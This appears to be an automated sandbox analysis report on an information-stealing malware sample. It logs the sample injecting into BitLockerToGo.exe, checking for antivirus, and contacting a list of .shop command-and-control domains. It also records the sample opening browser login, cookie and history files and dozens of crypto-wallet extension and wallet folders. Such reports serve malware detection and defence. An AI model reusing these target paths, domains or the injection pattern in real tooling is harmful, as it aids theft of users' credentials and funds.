              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696487552f
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2217427604.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.00000000027E8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696487552o
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A1B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696487552p
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696487552j
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: 6xmBUtHylU.exe, 00000000.00000002.2209285482.00000245B1FC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696487552t
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696487552s
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: BitLockerToGo.exe, 00000003.00000003.2238574332.0000000004A16000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | API call chain: ExitProcess graph end node | graph_3-11453
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information queried: ProcessInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process queried: DebugPort
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00267840 LdrInitializeThunk

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 230000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 230000 value starts with: 4D5A
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: benchillppwo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: publicitttyps.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: answerrsdo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: radiationnopp.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: affecthorsedpo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bargainnykwo.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bannngwko.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: bouncedgowp.shop
              Source: 6xmBUtHylU.exe, 00000000.00000002.2208741125.000000C0001BA000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: citizencenturygoodwk.shop
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 230000
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 24B7008
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Queries volume information: C:\Windows VolumeInformation
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Queries volume information: C:\Windows\AppReadiness VolumeInformation
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: BitLockerToGo.exe PID: 3800, type: MEMORYSTR
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
              Source: BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletD
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
              Source: BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
              Source: BitLockerToGo.exe, 00000003.00000003.2290216843.0000000002831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
